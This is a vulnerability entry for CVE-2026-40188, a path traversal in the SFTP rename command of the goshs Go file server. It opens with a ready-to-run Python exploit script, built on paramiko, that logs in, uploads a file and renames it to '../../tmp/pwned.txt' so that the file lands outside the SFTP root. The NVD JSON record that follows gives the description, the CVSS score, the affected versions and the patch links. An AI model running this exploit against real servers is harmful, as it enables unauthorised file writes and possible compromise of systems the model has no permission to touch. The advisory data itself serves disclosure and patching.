CVE-2026-40188

import paramiko import sys # Exploit for CVE-2026-40188: goshs SFTP Path Traversal via Rename # Target: goshs < 2.0.0-beta.4 def exploit(host, port, username, password): try: # Create SSH client transport = paramiko.Transport((host, port)) transport.connect(username=username, password=password) sftp = paramiko.SFTPClient.from_transport(transport) print(f"[*] Connected to {host}:{port}") # 1. Create a dummy file inside the allowed root directory local_file = 'payload.txt' remote_safe_file = 'payload.txt' with open(local_file, 'w') as f: f.write('Malicious content') sftp.put(local_file, remote_safe_file) print(f"[*] Uploaded {local_file} to {remote_safe_file}") # 2. Exploit the rename vulnerability # Source path is sanitized, but Destination path is NOT # We try to rename the file to escape the root directory malicious_dest = "../../tmp/pwned.txt" print(f"[*] Attempting to rename {remote_safe_file} to {malicious_dest}...") sftp.rename(remote_safe_file, malicious_dest) print("[+] Exploit successful! File written outside root directory.") sftp.close() transport.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 5: print(f"Usage: python {sys.argv[0]} <host> <port> <user> <pass>") sys.exit(1) exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4])

{"cve": {"id": "CVE-2026-40188", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:23.733", "lastModified": "2026-04-14T20:15:28.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability is fixed in 2.0.0-beta.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1314"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:goshs:goshs:*:*:*:*:*:go:*:*", "versionStartIncluding": "1.0.7", "versionEndExcluding": "2.0.0", "matchCriteriaId": "1CC7DF19-7DCC-4ACF-B4ED-789E769A8B3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:goshs:goshs:2.0.0:beta1:*:*:*:go:*:*", "matchCriteriaId": "047ECFC3-056F-4FAC-9B64-5F7C120CFFE1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:goshs:goshs:2.0.0:beta2:*:*:*:go:*:*", "matchCriteriaId": "6EA86AD2-EE6D-4427-9434-A9A49A4D38F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:goshs:goshs:2.0.0:beta3:*:*:*:go:*:*", "matchCriteriaId": "F44CF6A3-C1BC-4636-A1D5-1ED69A340FE3"}]}]}], "references": [{"url": "https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}